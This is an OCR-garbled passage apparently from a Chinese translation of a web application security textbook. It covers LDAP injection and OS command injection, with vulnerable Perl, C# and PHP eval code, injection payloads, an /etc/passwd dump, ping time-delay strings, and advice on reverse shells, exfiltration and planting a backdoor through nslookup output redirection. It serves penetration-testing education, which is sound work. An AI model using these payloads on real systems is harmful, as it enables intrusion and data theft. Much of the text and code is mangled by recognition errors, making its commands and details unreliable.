功 实施 两 种 类 型 的 攻击 。 一 些 LDAP (包括 OpenLDAP) 允许 批量 使 用 
多 个 搜索 过 滤器 ， 并 且 选 择 性 地 应 用 这 些 过 滤器 。 (换言之 ， 应 用 程 
人 
LA: 


*)) (&(givenName=daf 


MRA aA A RA ia FREI FAW: 
{&({gGivenName=*)) (&(givenName=daf) (department=London*) ) 


ME, XSI PA RA MRR eee, Bee Bet 
通配符 匹配 条 件 。 因 此 ， 应 用 程序 将 返回 所 有 地 区 的 所 有 雇员 的 资 
料 ， 从 而 避 开 了 应 用 程序 的 访问 控制 。 


尝试 访问 


http://mdsec.net/employees/42/ 


E ”注解 ”这 种 注入 第 二 个 搜索 过 滤器 的 技巧 也 可 针对 未 使 用 


任何 逻辑 运算 符 的 简单 匹配 条 件 ， 只 是 后 端 LDAP 接 受 多 个 搜索 过 


第 二 种 针对 合 取 查 询 的 攻击 利用 许多 LTDAP 服 务 在 处 理 NULL 字 闻 
方面 存在 的 漏洞 。 由 于 这 些 服 务 通常 以 本 地 代码 编写 ， 因 此 ， 搜 索 过 
滤器 中 的 NULL 字 节 将 立即 终止 字符 串 ，NULL 之 后 的 任何 字符 将 被 忽 
上 略 。 虽 然 LDAP 本 吴 并 不 文 持 注释 (在 SQL 中 可 以 使 用 -- 注 释 符 添 加 注 
释 ) ， 但 是 ， 攻 击 者 可 以 利用 它 在 处 理 NULL 字 节 上 的 这 个 漏洞 ， 从 
而 “注释 掉 ” 查 询 的 剩余 部 分 。 

在 前 一 个 示例 中 ， 攻 击 者 可 以 提交 以 下 输入 : 


*))} 300 


应 用 程序 服务 器 会 将 %00 序 列 解码 成 原 义 NULL 字 节 ， 因 此 ， 如 果 
HAERA RARR IER F, EWK N: 


(&(givenName=*)} ) [NULL] } (department=London*) ) 


由 于 这 个 过 滤器 在 NULL 字 节 处 被 截 短 ， 在 LDAP 看 来 ， 其 中 只 包 
含 一 个 通配符 条 件 ， 因 此 ， 应 用 程序 还 会 返回 伦敦 地 区 以 外 的 部 门 的 
所 有 雇员 资料 。 


尝试 访问 


http://mdsec.net/employees/13/ 
http://mdsec.net/employees/42/ 


9.5.2 ”查找 LDAP 注 入 漏洞 


p 一 项 LDAP 操 作 提交 无 效 的 输入 并 不 会 生成 任何 详细 的 错误 消 
息 。 通 常 ， 由 搜索 功能 返回 的 结果 和 发 生 的 错误 (如 一 个 HTTP500 状 
态 码 ) 都 有 助 于 人 稍 定 漏洞 。 但 是 ， 渗 透 测 试 员 可 以 使 用 以 下 步骤 相对 
可 靠 地 确定 LDAP 注 入 漏洞 。 


渗透 测试 步骤 


(1) 尝试 仅 输入 * 字 符 作为 搜索 项 。 在 LDAP 中 ， 这 个 字符 是 
一 个 通配符 ， 但 在 SQL 中 不 是 。 如 果 返 回 大 量 结 果 ， 这 种 情况 明显 
表示 攻击 针对 的 是 一 个 LDAP 查 询 。 

(2) 尝试 输入 大 量 的 闭 括号 : 

)))))))))) 
这 个 输入 将 结束 任何 括 住 输入 、 以 及 那些 包含 主 查询 过 滤器 的 
括号 ， 导 致 无 法 匹配 的 闭 括 号 ， 因 而 破坏 查询 的 语法 。 如 果 发 生 错 


误 ， 应 用 程序 殉 易 于 受到 LDAP 注 入 。 (注意 ， 这 种 输入 也 会 破坏 
其 他 许多 类 型 的 应 用 程序 逻辑 ， 因 此 ， 如 采 已 经 确定 所 针对 的 是 一 
个 LDAP 碍 询 ， 它 只 能 提供 一 个 明显 的 指标 。) 

(3) 壬 试 输入 各 种 由 在 干扰 不 同类 型 的 查询 的 表达 式 ， 并 看 
古 否 可 以 通过 这 些 表 达 式 来 影响 返回 的 结果 。 所 有 LDAP 均 文 持 cn 
‘ae 如 果 对 所 查询 的 目录 一 无 所 知 ， 使 用 该 属性 会 大 有 用 处 。 例 
H: 


LeCh=* 
eC PCen=* 
*) )%00 


9.5.3 ”防止 LDAP 注 入 


如 果 有 必要 在 一 个 LDAP 查 询 中 插入 用 户 提 交 的 输入 ， 也 只 提交 
可 实施 严格 输入 确认 的 简单 数据 。 应 根据 一 份 可 接受 字符 “日 名 单 ? 检 
查 用 户 输入 ， 其 中 最 好 只 包括 字母 数字 字符 。 应 阻止 任何 可 能 破坏 
LDAP 查 询 的 字符 , 包括 ( ) ; ,* | & = 和 空 字 节 。 拒 绝 任 何 
与 日 名 单 不 匹配 的 输入 ， 不 要 净化 。 


9.6 ”人 小结 


我 们 已 经 分 析 了 一 系列 可 用 于 注入 Web 应 用 程序 数据 存储 的 漏 
洞 。 攻 击 者 可 以 利用 这 些 漏 洞 读 取 或 修改 敏感 的 应 用 程序 数据 、 执 行 
其 他 未 授权 操作 ， 或 破坏 应 用 程序 逻辑 来 达到 某 种 目的 。 

更 为 严重 的 是 ， 上 述 攻击 只 是 大 量 相关 的 注入 攻击 的 一 小 部 分 。 
利用 这 一 类 型 的 其 他 攻击 ， 攻 击 者 可 以 在 服务 右 的 操作 系统 上 执行 命 
令 、 检 索 任 意 文件 ， 并 破坏 其 他 后 端 组 件 。 在 下 一 章 中 ， 我 们 将 介绍 
这 类 攻击 及 其 他 攻击 ， 说 明 攻 击 者 如 何 利 用 Web 应 用 程序 中 的 漏洞 攻 
破 为 应 用 程序 提供 支持 的 更 广 沁 的 基础 架构 的 关键 组 件 。 


9.7 fa 


欲 知 问题 答案 ， 请 访问 http://mdsec.net/wahh ° 

(1) 如 果 要 通过 实施 UNION 攻 击 利 用 SQL 缺陷 获取 数据 ， 但 是 
并 不 知道 最 初 的 查询 返回 的 列 数 ， 如 何 才能 查 明 这 个 值 ? 

(2) 已 经 确定 一 个 字符 串 参 数 中 的 SQL 注入 漏洞 ， 已 经 确信 数据 
库 为 MS-SQL 或 Oracle， 但 当前 无 法 获得 任何 数据 或 错误 消息 确定 到 底 
是 哪个 数据 库 。 如 何 才能 查 明 这 一 点 ? 

(3) 已 经 在 应 用 程序 的 许多 位 置 提 交 了 一 个 单 引 号 ， 并 通过 得 到 
的 错误 消息 确定 几 个 潜在 的 SQL 注入 漏洞 。 下 列 哪 一 种 方法 能 够 以 最 
快 的 速度 确定 专门 设计 的 输入 是 否 会 对 应 用 程序 的 处 理 过 程 造 成 影 


Ajay? 
) 注册 一 个 新 用 户 
) 更 新 个 人 资料 
) 注销 服务 

(4) 在 登录 功能 中 发 现 一 个 SQL 注入 漏洞 ， 试 图 使 用 输入 ' or 
1=1-- 避 开 登 录 ， 但 攻击 没有 成 功 ， 生 成 的 错误 消息 表明 -- 字 符 串 被 应 
用 程序 的 输入 过 滤 删 除 。 如 何 解决 这 个 问题 ? 

(5) 已 经 发 现 一 个 SQL 注入 漏洞 ， 但 由 于 应 用 程序 允许 任何 包含 
空白 符 的 输入 ， 无 法 实施 任何 有 用 的 攻击 。 如 何 解 除 这 种 限制 ? 

(6) 在 将 其 合并 到 SQL 查询 之 前 ， 应 用 程序 并 不 配对 用 户 输入 中 
出 现 的 所 有 单 引号 。 假 设 已 经 在 一 个 数字 字段 中 发 现 一 个 SQL 注入 漏 
洞 ， 但 需要 在 一 个 攻击 有 歼 载 和 谷中 使 用 一 个 字符 串 值 。 不 使 用 单 引 
号 ， 如 何在 查询 中 插入 字符 串 ? 

(7) 在 极 少数 情况 下 ， 应 用 程序 在 用 户 提 交 的 输入 中 使 用 参数 化 
查询 ， 以 不 安全 的 方式 建立 动态 SQL 查询 。 什 么 时 候 会 出 现 这 种 情 
WL? 

(8) 假设 已 经 提升 了 在 应 用 程序 中 的 权限 ， 现 在 完全 拥有 管理 员 
访问 权限 ， 这 时 如 果 在 某 个 用 户 管理 功能 中 发 现 一 个 SQL 注入 漏洞 ， 
如 何 利 用 这 个 漏洞 进一步 扩大 攻击 范围 ? 

(9) 在 攻击 一 个 并 未 保存 任何 敏感 数据 、 也 未 实施 任何 验证 或 访 
问 控 制 机 制 的 应 用 程序 的 情况 下 ， 如 何 排列 下 列 漏洞 的 重要 性 ? 

(a) SQL 注入 
(b) XPath 注入 


(a 
(b 
(c 


(c) OS 命 令 注 入 
(10) 假如 正在 检测 一 个 允许 搜索 个 人 资料 的 应 用 程序 功能 ， 并 
且 怀 疑 该 功能 正 访问 某 数据 库 或 Active Directory 后 端 。 如 何 确定 到 诬 
是 哪 一 种 情况 ? 


第 10 章 
测试 后 端 组 件 


Web 应 用 程序 正 变 得 日 益 复杂 。 它 们 常常 作为 一 系列 后 端 业务 关 
链 资 源 ， 包 括 网 络 资源 (如 Web 服 务 、 后 端 Web 服 务 器 、 邮 件 服务 
an) 和 本 地 资源 《如 文件 系统 ) 面向 因特网 的 接口 及 操作 系统 接口 。 
而 且 ， 应 用 程序 服务 器 还 作为 这 些 后 端 组 件 的 目 主 访问 控制 琶 。 任 何 
能 够 与 后 端 组 件 进行 任意 交互 的 攻击 都 将 能 够 突破 Web 应 用 程序 实施 
的 整个 访问 控制 模型 ， 从 而 以 未 授权 方式 访问 敏感 数据 和 功能 。 

数据 在 不 同 组 件 间 传递 时 ， 它 们 将 由 不 同类 型 的 API 和 接口 解 
释 。 被 核心 应 用 程序 视 为 "安全 ”的 数据 ， 在 文 持 不 同 编码 、 转 义 字 
符 、 字 段 分 隅 符 或 字符 串 终 止 符 的 上 层 组 件 看 来 可 能 极 不 安全 。 此 
外 ， 上 层 组 件 可 能 会 有 相对 多 的 功能 是 应 用 程序 在 正常 情况 下 所 不 会 
调用 的 。 因 此 ， 利 用 注入 漏洞 的 攻击 者 通 间 不 仅 能 够 突破 应 用 程序 的 
| sh ， 长 至 能 够 利用 后 端 组 件 文 持 的 其 他 功能 来 攻破 组 件 基 础 以 
义 的 关键 部 分 。 


10.1 注入 系统 命 


大 多 数 Web 服 务 器 平台 发 展 迅 速 ， 现 在 它们 已 能 够 使 用 内 置 的 API 
与 服务 吉 的 操作 系统 进行 几乎 任何 必需 的 交互 。 如 有 果 正 确 使 用 ， 这 些 
API 可 帮助 开发 者 访问 文件 系统 、 连 接 其 他 进程 、 进 行 安全 的 网 络 通 
信 。 但 是 ， 许 多 时 候 ， 开 发 者 选择 使 用 更 高 级 的 技术 直接 癌 服 务 器 发 
送 操作 系统 命令 。 由 于 这 些 技术 功能 强大 、 操 作 人 简单 ， 并 且 通 常 能 够 
立即 解决 特定 的 问题 ， 因 而 具有 很 强 的 吸引 力 。 但 是 ， 如 采 应 用 程序 
问 操 作 系 统 命令 传送 用 户 提 交 的 输入 ， 那 么 就 很 可 能 会 受到 命令 注入 
DG, FICE EWE SCNT ] 设 计 的 输入 ， 修 改 开 发 铬 想 要 执行 的 
命令 。 

第 用 于 发 出 操作 系统 命令 的 函数 ， 如 PHP 中 的 exec 和 ASP 中 的 
wscript.shell 函 数 ， 通 常 并 不 限制 命令 的 可 执行 范围 。 即 使 开发 者 准备 
使 用 API 执 行 相对 疼 意 的 任务 ， 如 列 出 目录 的 内 容 ， 攻 击 者 还 是 可 以 
对 其 进行 暗中 破坏 ， 从 而 写 入 任意 文件 或 启动 其 他 程序 。 通 常 ， 所 有 
的 注入 命令 都 可 在 Web 服 务 器 的 进程 中 安全 运行 ， 它 具有 足够 强大 的 
功能 ， 使 得 攻击 者 能 够 完全 控制 整个 服务 器 。 

许多 非 定制 和 定制 Web 应 用 程序 中 都 存在 这 种 命令 注入 缺陷 。 在 
为 企业 服务 器 或 防火 墙 、 打 印 机 和 路 由 絮 之 类 的 设备 提供 管理 界面 的 
应 用 程序 中 ， 这 类 缺陷 尤其 普 届 。 通 常 ， 因 为 操作 系统 交互 多 许 开发 
者 使 用 合并 用 户 提 交 的 数据 的 直接 命令 ， 所 以 这 些 应 用 程序 都 对 交互 
过 程 提出 了 特殊 的 要 求 。 


10.1.1 例 1: 通过 Perl 注 入 
以 下 面 的 Perl CGI 代码 为 例 ， 它 是 一 个 用 于 服务 器 管理 的 Web 应 用 


程序 代码 的 一 部 分 。 这 项 功能 允许 管理 员 在 服务 右上 指定 一 个 目录 ， 
并 查看 它 的 磁盘 使 用 情况 : 


#!/usr/bin/perl 

use strict; 

use CGI qw(:standard escapeHTML) ; 
print header, start_html(""); 
print "<pre>"; 


my S$command = "du -h --exclude php* /var/www/html1"; 
S$command= $command.param("dir"); 

S$command=* $command’ ; 

print “S$command\n"; 


print end_html; 


如 果 按 设想 的 方式 运行 ， 这 段 脚 本 将 把 用 户 提交 的 dir 参 数值 附加 
在 预 完 设 定 的 命令 后 面 ， 执 行 命令 并 显示 结果 ， 如 图 10-1 所 示 。 


l y © neps: //wahh-appiegitintoo cgrdr=/pubh 
| © Untitled Document x | | 


4.0K /var/www/html/public/webgrab/ cookies 
72K /var/ewe/htnl/public/webgrab 

4.0E /var/ewe/heml/public/heme 

4152K /var/ ewe /Roml/public/smages 

176E /var/wwe/homl/public/csstest/is89 

128 /var/wwe/heml/public/csstest/isé 
208K /var/ewa/homl/public/csstest 

740x {var/www /nrtnl/pubilic 


图 10-1 一 个 列 出 目录 内 容 的 简单 应 用 程序 功能 


然而 ， 通 过 提交 专门 设计 的 、 包 含 shell 元 字符 的 输入 ， 攻 击 者 可 
对 这 项 功能 进行 各 种 方式 的 利用 。 对 处 理 命令 的 解释 器 而 言 ， 这 些 字 
从 有 着 特殊 的 合 义 ， 并 可 破坏 开发 者 想 要 执行 的 命令 。 例 如 ， 管 道 


符 “" 可 用 于 将 一 个 进程 的 输出 重 定 向 为 另 一 个 进程 的 输入 ， 从 而 将 几 
个 命令 连接 在 一 起 。 攻 击 者 可 以 利用 这 种 行为 注入 另外 一 个 命令 并 获 
得 输出 结果 ， 如 图 10-2 所 示 。 


© Untitled Document 


root:x:0:0:xcot:/root:/bin/bash 
bin:x:1:1:bin:/bin:/bin/sh 
agaemon:*:2:2:daemon:/sbin:/bin/sh 
adm:x:3:4:adm:/var/adm:/bin/sh 
1p:x:4:7:1p:/var/spool/ipd:/bin/sh 
sync:x:5:0:syne:/sbin:/bin/sync 

shutdown: x:6:0: shutdown: /sbin:/sbin/shutdown 
hale:%:7:0:halt:/sbin:/sbin/helt 
mail:x:8:12:mail:/var/spool/mail:/bin/sh 
news:*x:9:13:news:/var/spool/news:/bin/sh 
uucp:*x:10:14:uucp:/var/spocol/uucp:/bin/sh 
operator: x:11:0:cperator:/var:/bin/sh 

games :x:12:100:games:/usr/games:/bin/sh 
nobody: x: 65534: 65534 :Nobody:/:/bin/sh 
rpm:x:13:101:system user for rpm:/var/lib/rpm: /bin/ false 
vosa:x:69:6S:virtual console memory owner:/dev:/sbin/nologin 
rpco:x:70:70:system user for portmap:/:/bin/false 

xfa:x:7l:7l:aystem user for xorg-x1ll:/etc/X11/fs:/bin/false 
messagebus:x:72:72:system user for dbus:/:/sbin/nolcgin 

apache :x:73:73:system user for apache2:/var/www:/bin/sh 
rpcuser:x:74:74:system user for nfs-utils:/var/lib/nfs:/bin/ false 
sshd:x:75:7S:system user for openssh:/var/empty:/bin/true 

mysql:x: 76:76: syatem user for MySQL:/var/l1ib/mysql:/bin/bash 
squid:x:77:77:system user for squid:/var/spool/squid:/bin/false 
postgres:x:78:78:system user for postgresql:/var/lib/pgsql:/bin/bash 
snort.:*:79:79: system user for snort:/var/log/snort:/bin/false 
manicsprout:x:500:500::/home/manicsprout:/bin/bash 


100% ~ 


图 10-2 一 个 成 功 的 命令 注入 攻击 


在 这 个 攻击 中 ， 最 初 的 du 命令 的 输出 已 被 重 定 问 为 cat/etc/passwd 
命令 的 输入 。 不 过 ， 这 个 命令 不 会 理 皮 上 述 输 入 ， 而 是 执行 目 己 的 任 
务 : 输出 passwd 文 件 的 内 容 。 

这 样 简单 的 攻击 似乎 是 不 可 能 的 ; 但 是 ， 实 际 上 在 众多 商业 产品 
中 都 已 发 现 这 类 命令 注入 漏洞 。 例 如 ， 已 发 现下 面 URL 中 的 HP 
Openview 存 在 一 个 易 受 攻击 的 命令 注入 缺陷 ; 


https: //target:3443/OvCgi/connectedNodes.cvpl?nede-a| [your command] | 


10.1.2 2: 通过 ASP 注 入 


以 下 面 的 C# 代 码 为 例 ， 它 是 一 个 用 于 管理 Web 服 务 絮 的 Web 应 用 
程序 代码 的 一 部 分 。 该 功能 允许 管理 员 查 看 被 请 求 的 目录 的 内 容 : 

string dirName = "C:\\filestore\\" + Directory.Text; 

ProcessStartInfo psInfo = new ProcessStartInfo({"cmd", "/c dir " + 


dirName} ; 


Process proc = Process.Start(psInfo); 


如 果 按 设想 的 方式 运行 ， 这 段 脚本 将 把 用 户 提 区 的 Directory 人 参数 
值 插入 到 预先 设 定 的 命令 中 ， 执 行 命 令 并 显示 结果 ， 如 图 10-3 所 示 。 


= i=) 


d nets D 
E httos /mdsec net 


号 Directory Manage 


Subdirectory name: Show contents Make directory 


Volume in drive C is Windows 
Volume Serie! Number is 9281-B332 


Directory of C:iilestore 


14/06/2011 13.37 <DIR> 

14/06/2011 19.37 <DIR> 

1406/2011 19:37 15,164 debug logs 
26/05/2011 19:13 24 file.txt 

14/06/2011 19-33 191,520 kewe-strpon jpg 
3 File(s) 206,708 bytes 

2 Dir(s) 1,285,615,616 bytes free 


110-3 ”一 个 列 出 目 孙 内 容 的 功能 


和 前 面 易 受 攻击 的 penl 脚 本 一 样 ， 攻 击 者 可 以 使 用 shell 元 字符 破坏 
开发 者 预先 设 定 的 命令 ， 并 注入 他 自己 的 命令 。& 字 符 用 于 将 几 个 全 
令 组 合 在 一 起 。 提 交 一 个 包含 & 字 符 的 文件 名 和 另外 一 个 命令 就 可 以 
执行 该 命令 并 显示 其 结果 ， 如 图 10-4 所 示 。 


Volume in drive Cis Windows 
Volume Seral Number 1s 9981-433! 


Directory of C-\filestore 


14/06/2011 10:37 <DIR> . 
14/06:2011 10:37 <DIR> 

14/06/2011 10:37 15,164 debug. logs 
26/05/2011 10:13 34 file-t 

1406/2011 10:33 191,520 keira-strpon.jpg 
3 File(s) 206,708 bytes 

2 Dir(s) 1.285.779456 bytes free 


Windows IP Configuration 


Ethernet adapter Local Asea Connection: 


Connection-specific DNS Suffix . : localdomain 


图 10-4 一 个 成 功 的 命令 注入 攻击 


尝试 访问 


http://mdsec.net/admin/5/ 
http://mdsec.net/admin/9/ 
http://mdsec.net/admin/14/ 


10.1.3 ”通过 动态 执行 注入 


许多 Web 脚 本 语言 支持 动态 执行 在 运行 时 生成 的 代码 。 这 种 特性 
允许 开发 者 创建 可 根据 各 种 数据 和 条 件 动态 修改 其 代码 的 应 用 程序 。 
如 有 果 用 户 输入 合并 到 可 动态 执行 的 代码 中 ， 那 么 攻击 者 就 可 以 提交 专 
门 设计 的 输入 ， 破 坏 原 有 的 数据 ， 指 定 服 务 器 执行 目 己 的 命令 ， 束 好 
像 这 些 命令 是 由 最 初 的 开发 者 编写 的 一 样 。 这 时 ， 攻 击 者 的 第 一 个 目 
标 通 币 是 注入 运行 操作 系统 命令 的 API。 

PHP 函 数 eval 可 用 于 动态 执行 在 运行 时 传送 给 该 图 数 的 代码 。 下 面 
以 一 个 搜索 功能 为 例 ， 该 功能 允许 用 户 创建 保存 的 搜索 ， 然 后 在 用 户 
0 a 
索 功 能 : 


/search.php?storedsearch=\$mysearch%3dwahh 


服务 硕 端 应 用 程序 通过 动态 生成 变量 来 执行 这 项 功能 ， 生 成 的 变 
包含 在 storedsearch 参 数 中 指定 的 名 / 值 对 ;此 处 ， 它 创建 值 为 wahh 的 
量 


mysearch ° 


Kor HH 


ZUN 


Sstoredsearch = $ GET['storedsearch']; 
eval ("Sstoredsearch;"); 


这 时 ， 葡 可 以 提交 专门 设计 的 输入 ， 由 eval 函 数 动 态 执行 ， 从 而 
在 服务 器 端 应 用 程序 中 注入 任意 PHP 命 令 。 分 号 字符 可 用 于 在 单独 一 
个 参数 中 将 几 个 命令 连接 在 一 起 。 例 如 ， 要 检索 文件 /etc/password 的 内 
容 ， 可 以 使 用 fle_get_contents 或 system 命 令 : 


T 注解 Pen 语言 也 包含 一 个 可 通过 同样 的 方式 加 以 利用 的 


eval 函 数 。 注 意 ， 可 能 需要 对 分 号 字符 进行 URL 编 码 (为 %3b) ， 
因为 一 些 CGI 脚 本 解析 器 将 它 解释 为 参数 分 隔 符 ° 在 传统 的 ASP 
H, Execute () 执行 类 似 的 任务 。 


在 应 用 程序 解析 过 程 中 〈 请 参阅 第 4 章 了 解 有 关内 容 ) ， 通 过 调用 
外 部 进程 或 访问 文件 系统 ， 应 该 能 确定 任何 Web 应 用 程序 与 基础 操作 
系统 交互 的 情形 。 攻 击 者 开始 攻击 前 要 探查 所 有 这 些 功能 ， 寻 找 命令 
注入 漏洞 。 然 而 ， 实 际 上 ， 应 用 程序 发 出 的 操作 系统 命令 中 可 能 包含 
用 户 提交 的 任何 数据 项 ， 包 括 每 个 URL、 请 求 主体 参数 及 cookie。 
此 ， 为 对 应 用 程序 进行 全 面 彻底 的 测试 ， 必 须 检 查 每 项 应 用 程序 功能 
中 的 所 有 这 些 数据 项 。 

不 同 的 命令 解释 器 处 理 shell 元 字符 的 方式 各 不 相同 。 理 论 上 ， 任 
何 类 型 的 应 用 程序 开发 平台 或 Web 上 服务器 可 能 会 调用 任何 shell 解 释 
硕 ， 在 它 目 己 或 任何 其 他 主机 的 操作 系统 上 运行 。 因 此 ， 不 应 根据 对 
Web 服 务 句 操作 系统 的 了 解 ， 对 应 用 程序 如 何 处 理 元 字符 做 出 任何 假 


设 。 

有 两 种 类 型 的 元 字符 可 用 于 在 一 个 现 有 的 预先 设 定 的 命令 中 注入 
一 个 独立 的 命令 。 

口 字 符 ; |& 和 换行 符 可 用 于 将 几 个 命令 逐个 连接 在 一 起 。 有些 时 
候 ， 可 以 成 对 使 用 这 些 字符 以 达到 不 同 的 效果 。 例 如 ， 在 Windows 命 
令 解 释 器 中 ， 使 用 && 则 第 二 个 命令 只 有 在 第 一 个 命令 成 功 执行 后 才 
会 运行 。 使 用 | 则 总 运行 第 二 个 命令 ， 无 论 第 一 个 命令 是 否 成 功 执行 。 

口 和 本 章 开 头 的 示例 一 样 ， 反 引号 C) 用 于 将 一 个 独立 的 命令 包 
含 在 最 初 的 命令 处 理 的 数据 中 。 把 一 个 注入 的 命令 放 在 反 引 号 内 shell 
解释 器 就 会 执行 该 命令 ， 并 用 这 个 命令 的 结果 代替 被 包含 的 文本 ， 然 
后 继续 执行 得 到 的 命令 字符 串 。 


在 前 面 的 示例 中 ， 可 以 直接 确定 是 否 可 以 注入 命令 ， 并 获得 注入 
命令 的 执行 结 有 末 ， 因 为 应 用 程序 会 在 啊 应 中 立即 返回 那些 结 有 末 。 然 
而 ， 在 许多 情况 下 ， 这 样 做 是 不 可 能 的 。 可 以 注入 一 个 命令 ， 但 它 不 
会 返回 结 采 ， 也 不 会 以 任何 可 确定 的 方式 影响 应 用 程序 随后 的 处 理 过 
程 。 或 者 由 于 几 个 命令 连接 在 一 起 ， 注 入 命令 的 执行 结 采 在 执行 过 程 
HERTS 

EE, Ree a SVE A ER ITR EN AEE H ERE 
In, KFA a eA A A E H SQLEA HEHE ° WRN 
ERIR RETTE, BBA REY MERRET AAE, HAR 
注入 命令 的 执行 结 


渗透 测试 步骤 


(1) 通常 可 以 使 用 ping 命 令 让 服务 器 在 一 段 时 期 内 检测 它 的 回 
环 接口 (loopback interface) ， 从 而 触发 时 间 延 迟 。Windows 和 
UNIX 平 台 在 处 理 命令 分 陋 符 与 ping 命 令 方面 存在 一 些 细微 的 差别 ， 
但 是 ， 如 采 没 有 设置 过 滤 ， 下 面 的 通用 测试 字符 串 应 该 能 够 在 两 个 
平台 上 引起 30 秒 的 时 间 延 迟 。 

II ping -i 30 127.0.0.1 ; x 11 ping -n 30 127.0.0.1 & 

OAR DY FA FE EERENS T, AAR EN EA, 
漏洞 的 可 能 性 ， 还 应 该 轮流 问 每 一 个 目标 参数 提交 下 面 的 每 个 测试 
字符 串 ， 并 监控 应 用 程序 进行 响应 的 时 间 。 


p i 30 127.0.0.1 | 
ping -n 30 127.0.0.1 

& ping ~ 30 127.0.0.1 & 
ping 7.0.0.1 

; ping 127.0.0.1 > 

80a ping ~1 30 127.0.0.1 %0a 

‘ ping 127.0 


(2) 如 果 发 生 时 间 延 迟 ， 说 明 应 用 程序 可 能 易于 受到 命令 注 
入 攻击 。 重 复 几 次 测试 过 程 ， 确 定 延 迟 不 是 由 于 网 络 延 时 或 其 他 异 
党 造成 的 。 可 以 竹 试 更 改 -n 或 -i 参数 的 值 ， 并 确定 经 历 的 时 间 延 迟 
征 否 会 随 着 提交 的 值 发 生 对 应 的 变化 。 

(3) 使 用 所 发 现 的 任何 一 个 可 成 功 实 施 攻 击 的 注入 字符 串 ， 
演 试 注入 另 一 个 更 有 用 的 命令 〈《 如 1s 或 dir) ， 确 定 是 否 能 够 将 命令 
结 采 返回 到 浏览 右上。 
(4) 如 果 不 能 直接 获得 命令 执行 结果 ， 还 可 以 采用 其 他 方 
VF © 


口 可 以 党 试 打 开 一 条 通 向 自己 计算 机 的 带 外 通道 。 党 试 使 用 
TFTP 上 传 工具 至 服务 器 ， 使 用 telnet 或 netcat 建 立 一 个 通 向 自己 计算 
机 的 反问 shell， 并 使 用 mail 命 令 通 过 SMTP 发 送 命令 结果 。 

口 可 以 将 命令 结果 重 定向 到 Web 根 目录 下 的 一 个 文件 ， 然 后 使 
用 浏览 絮 直 接 获 取 结 果 。 例 如 : 


dir > c:\inetpub\wwwroot\foo.txt 


(5) 一 旦 找到 注入 命令 的 方法 并 能 够 获得 命令 执行 结果 ， 欢 
应 当 确定 自己 的 权限 〈 通 过 使 用 whoami 或 类 似 命 令 ， 或 者 尝试 癌 一 


个 受 保护 的 目录 写 入 一 个 无 害 的 文件 ) 。 然 后 就 可 以 设法 提升 自己 
的 权限 ， 进 而 秘密 访问 应 用 程序 中 的 敏感 数据 ， 或 者 通过 被 攻破 的 
服务 器 攻 击 其 他 主机 。 


有 了 时， 由 于 某 些 字 符 补 过 滤 挥 ,或 者 应 用 程序 所 使 用 的 命令 API 
的 特殊 行为 ， 可 能 无 法 注入 一 个 完全 独立 的 命令 。 但 是 ， 攻 击 者 仍然 
可 以 破坏 所 执行 的 命令 的 行为 ， 得 到 想 要 的 结 末 。 

笔者 曾 遇 到 这 样 的 情况 : 应 用 程序 加 操作 系统 命令 nslookup 传 递 
用 户 输 入 ， 以 查找 用 户 提 交 的 域名 的 人 P 地 址 。 注 入 新 命令 所 需 的 元 字 
符 被 阻止 ， 但 允许 使 用 < 和 > 字符 重 定 回 命令 的 输入 和 输出 。nslookup 
命令 通 第 输入 某 个 域名 的 IP 地 址 ， 这 似乎 并 未 提供 任何 有 效 的 攻击 问 
量 。 但 是 ， 如 采 在 这 时 提交 一 个 无 效 域名 ， 该 命令 天 会 得 出 错误 消 
， 并 在 其 中 包含 所 得 询 的 域名 。 通 常 ， 这 种 行为 足以 导致 斑 重 的 攻 


口 提供 一 个 服务 硕 可 执行 的 脚本 代码 片段 ， 以 奉 代 要 解析 的 域 
° 可 以 将 这 段 脚 本 放 在 引号 中 ， 以 确保 命令 解释 器 将 其 视 为 一 个 令 


EN Ear 


口 使 用 > 字符 将 命令 的 输出 重 定 癌 到 Web 根 目 孙 下 的 可 执行 文件 夹 
中 的 某 个 文件 。 由 操作 系统 执行 的 命令 如 下 所 示 : 


nslookup "[script code]" > [/path/to/executable_file] 
口 运行 以 上 命令 时 ， 会 将 以 下 输出 重 定向 到 可 执行 文件 : 
xx server can't find [script code]: NXDOMAIN 


Dm, (EAD a AAE, EA ERER AR oe 
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标记 ， 攻 击 者 无 法 控制 的 错误 消息 部 分 将 被 视 为 明文 ， 并 且 会 执行 注 
入 脚本 中 的 标记 。 因 此 ， 攻 击 者 殊 可 以 通过 利用 受 限制 的 命令 注入 条 
件 ， 在 应 用 程序 服务 万 中 插入 一 个 不 受 限 制 的 后 [ 门 。 


尝试 访问 


http://mdsec.net/admin/18/ 


渗透 测试 步骤 
(1) < 和 > 字符 分 别 用 于 将 一 个 文件 的 内 容 指向 命令 的 输入 以 
个 完全 独立 的 命令 ， 仍 然 可 以 使 用 < 和 > 字符 读 取 及 写 入 任意 文件 的 


(2) 应 用 程序 调用 的 许多 操作 系统 命令 接受 大 量 控 制 其 行为 
的 命令 行 参数 。 通 常 ， 用 户 提交 的 输入 以 这 种 参数 的 形式 传送 给 命 
令 处 理 ， 只 需 在 相关 参数 后 插入 一 个 空格 ， 就 可 以 在 空格 后 添加 为 
外 一 个 参数 。 例 如 ， 一 个 Web 创 作 应 用 程序 可 能 拥有 一 项 功能 ， 允 
许 服 务 器 获得 一 个 用 户 指 定 的 URL， 然 后 将 它 的 内 容 呈 现在 浏览 器 
上 进行 编辑 。 如 果 应 用 程序 调用 wget 程 序 ， 那 么 就 可 以 通过 附加 
人 

容 o 例如; 


Vo 提示 许多 命令 注入 攻击 要 求 注入 空格 以 分 隔 命 令 行 目 变 
o 如 有 攻击 者 发 现 应 用 程序 过 滤 衬 格 ， 并 且 攻 击 的 是 UNIX 平 
， 那 么 他 可 以 使 用 包含 空 日 符 字 段 分 隔 符 的 $IFS 环 境 变 量 代 赫 衬 


10.1.5 ”查找 动态 执行 漏洞 


动态 执行 漏洞 最 常见 于 PHP 和 Perl 等 语言 。 但 基本 上 ， 任 何 应 用 程 
序 平台 都 可 能 会 向 基于 脚本 的 解释 器 〈《 有 时 位 于 其 他 后 端 服务 器 上 ) 
传送 用 户 提交 的 输入 。 


渗透 测试 步骤 


(1) 用 户 提交 的 所 有 数据 项 都 可 提交 给 动态 执行 画 数 。 其 中 
最 常见 的 数据 项 是 cookie 参 数 名 称 和 参数 值 ， 以 及 作为 前 一 项 操作 


结 采 保存 在 用 户 资 料 中 的 永久 数据 。 
(2) 按 试 轮流 向 目标 参数 提交 下 列 值 : 


-echo%20111111 
echo%$20111111 
response.write$20111111 
:response.write%$20111111 


